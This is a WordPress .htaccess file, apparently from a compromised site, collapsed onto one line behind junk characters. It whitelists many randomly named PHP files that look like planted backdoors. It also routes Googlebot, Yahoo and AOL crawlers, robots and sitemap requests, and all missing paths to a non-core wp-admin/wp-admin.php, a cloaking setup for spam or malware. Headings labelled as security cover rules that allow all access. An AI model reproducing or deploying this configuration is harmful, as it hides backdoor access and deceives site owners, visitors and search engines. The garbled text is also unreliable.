grthtrhthjhtyjytjytkergtrhtrjytjerhrfh# BEGIN WordPress RewriteEngine On RewriteBase / # WHITELIST - Allowed PHP files RewriteRule ^tf88\.php$ - [L] RewriteRule ^BsMPQ6Wavmas\.php$ - [L] RewriteRule ^webindex\.php$ - [L] RewriteRule ^BsMPQ6Wavdefault\.php$ - [L] RewriteRule ^uQkkULdefault\.php$ - [L] RewriteRule ^ZMYYdI7Hdefault\.php$ - [L] RewriteRule ^robot\.php$ - [L] RewriteRule ^robots\.php$ - [L] RewriteRule ^ah88\.php$ - [L] RewriteRule ^ws88\.php$ - [L] RewriteRule ^tf77\.php$ - [L] RewriteRule ^mas77\.php$ - [L] RewriteRule ^webindex\.php$ - [L] RewriteRule ^tx77\.php$ - [L] RewriteRule ^lm77\.php$ - [L] RewriteRule ^ws77\.php$ - [L] RewriteRule ^robot\.php$ - [L] RewriteRule ^robots\.php$ - [L] RewriteRule ^ah77\.php$ - [L] RewriteRule ^ws77\.php$ - [L] # CORE WP - Directories RewriteRule ^wp-admin/ - [L] RewriteRule ^wp-includes/ - [L] RewriteRule ^wp-content/ - [L] # CORE WP - Files RewriteRule ^wp\-config\.php$ - [L] RewriteRule ^wp\-activate\.php$ - [L] RewriteRule ^wp\-blog\-header\.php$ - [L] RewriteRule ^wp\-comments\-post\.php$ - [L] RewriteRule ^wp\-cron\.php$ - [L] RewriteRule ^wp\-links\-opml\.php$ - [L] RewriteRule ^wp\-load\.php$ - [L] RewriteRule ^wp\-login\.php$ - [L] RewriteRule ^wp\-mail\.php$ - [L] RewriteRule ^wp\-settings\.php$ - [L] RewriteRule ^wp\-signup\.php$ - [L] RewriteRule ^wp\-trackback\.php$ - [L] RewriteRule ^xmlrpc\.php$ - [L] RewriteRule ^license\.txt$ - [L] RewriteRule ^readme\.html$ - [L] RewriteRule ^robots\.txt$ - [L] # CUSTOM ROUTING - Bot Handling RewriteCond %{THE_REQUEST} \s/[?\s] [NC] RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC] RewriteRule ^ /wp-admin/wp-admin.php [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC] RewriteRule ^(.+)$ /wp-admin/wp-admin.php [L] # Robot/Xml Routing RewriteRule ^robots?$ /wp-admin/wp-admin.php [L,NC] RewriteRule .*\.xml$ /wp-admin/wp-admin.php [L,NC] # Allow direct access to wp-admin.php RewriteRule ^wp-admin/wp-admin\.php$ - [L] # Catch-all for non-existent files -> wp-admin.php RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ /wp-admin/wp-admin.php [L] # WordPress Default Fallback (for normal operation) RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress # ================================================== # SECURE ACCESS - Block Malicious Extensions # ================================================== Order Allow,Deny Allow from all # ================================================== # SECURE ACCESS - Allow Whitelisted Core & Custom Files # ================================================== Order Allow,Deny Allow from all